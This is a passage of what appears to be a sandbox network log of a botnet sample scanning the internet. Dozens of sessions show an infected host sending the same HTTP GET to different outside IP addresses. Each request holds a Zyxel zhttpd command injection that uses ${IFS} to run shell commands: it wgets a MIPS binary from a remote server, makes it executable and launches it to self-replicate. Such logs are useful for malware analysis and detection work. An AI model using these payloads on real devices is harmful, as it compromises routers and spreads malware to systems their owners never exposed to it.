                                                  Jan 19, 2024 18:24:11.353408098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8153192.168.2.1349026103.236.124.120443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353442907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8154192.168.2.133974471.102.92.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353497028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8155192.168.2.133705842.165.190.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353523970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8156192.168.2.13386689.222.118.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353569984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8157192.168.2.134712435.46.70.73443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353617907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8158192.168.2.135836438.81.102.61443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353637934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8159192.168.2.134118672.43.126.93443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353673935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8160192.168.2.135572425.93.137.230443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353729963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8161192.168.2.1351894221.169.82.175443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353760004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8162192.168.2.1342032106.102.15.47443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353821993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8163192.168.2.134028497.244.208.85443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353853941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8164192.168.2.1337094166.185.106.207443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353882074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8165192.168.2.1353282192.63.133.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353919983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8166192.168.2.135432842.85.117.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.353972912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8167192.168.2.1339460156.51.131.95443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354001045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8168192.168.2.1353766133.140.1.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354047060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8169192.168.2.1344010207.187.82.253443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354074001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8170192.168.2.1355832218.79.247.198443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354120016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8171192.168.2.135978097.245.72.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354146957 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8172192.168.2.133751272.172.96.199443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354202032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8173192.168.2.1347254223.4.231.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354250908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8174192.168.2.1345884132.247.201.154443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354286909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8175192.168.2.13564341.174.119.104443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354307890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8176192.168.2.135933032.20.89.150443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354343891 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8177192.168.2.135807232.51.95.215443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354392052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8178192.168.2.1335774128.87.123.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354440928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8179192.168.2.135321495.241.232.71443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354460955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8180192.168.2.1340438123.22.163.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354510069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8181192.168.2.133568664.156.136.151443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354561090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8182192.168.2.1359938163.6.49.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354590893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8183192.168.2.1357904182.15.125.4443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354631901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8184192.168.2.1343958193.75.61.109443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354685068 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8185192.168.2.135976644.65.249.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354710102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8186192.168.2.1360728203.136.191.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354805946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8187192.168.2.1334574152.133.28.77443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354826927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8188192.168.2.1356080221.243.191.235443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354870081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8189192.168.2.1346522223.37.49.15443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354891062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8190192.168.2.134901650.55.211.178443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354929924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8191192.168.2.135204895.203.211.81443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.354985952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8192192.168.2.1347858125.103.68.25443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355029106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8193192.168.2.135796244.54.185.148443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355067968 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8194192.168.2.1333998150.155.32.208443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355088949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8195192.168.2.1343694193.122.100.222443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355144978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8196192.168.2.1348660177.73.232.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355179071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8197192.168.2.1359932126.87.108.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355212927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8198192.168.2.1334194105.241.149.216443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355262995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8199192.168.2.1354000134.248.83.141443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355292082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8200192.168.2.134430679.232.199.59443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355328083 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8201192.168.2.133783496.49.179.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355364084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8202192.168.2.1345494107.10.248.165443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355429888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8203192.168.2.1341766185.101.198.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355439901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8204192.168.2.134772217.255.61.70443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355494022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8205192.168.2.134255293.42.113.221443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355540037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8206192.168.2.13347322.26.215.89443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355571032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8207192.168.2.1357848161.76.155.126443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355616093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8208192.168.2.1345270105.51.122.75443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355655909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8209192.168.2.1359540125.131.6.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355690002 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8210192.168.2.133604065.40.110.171443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355736017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8211192.168.2.1335522196.135.121.56443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355767965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8212192.168.2.1337810216.153.223.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355802059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8213192.168.2.135324269.75.91.177443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355839014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8214192.168.2.1337036182.190.185.233443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:24:11.355871916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  8215192.168.2.133720457.240.24.143443
                                                  TimestampBytes transferredDirectionData
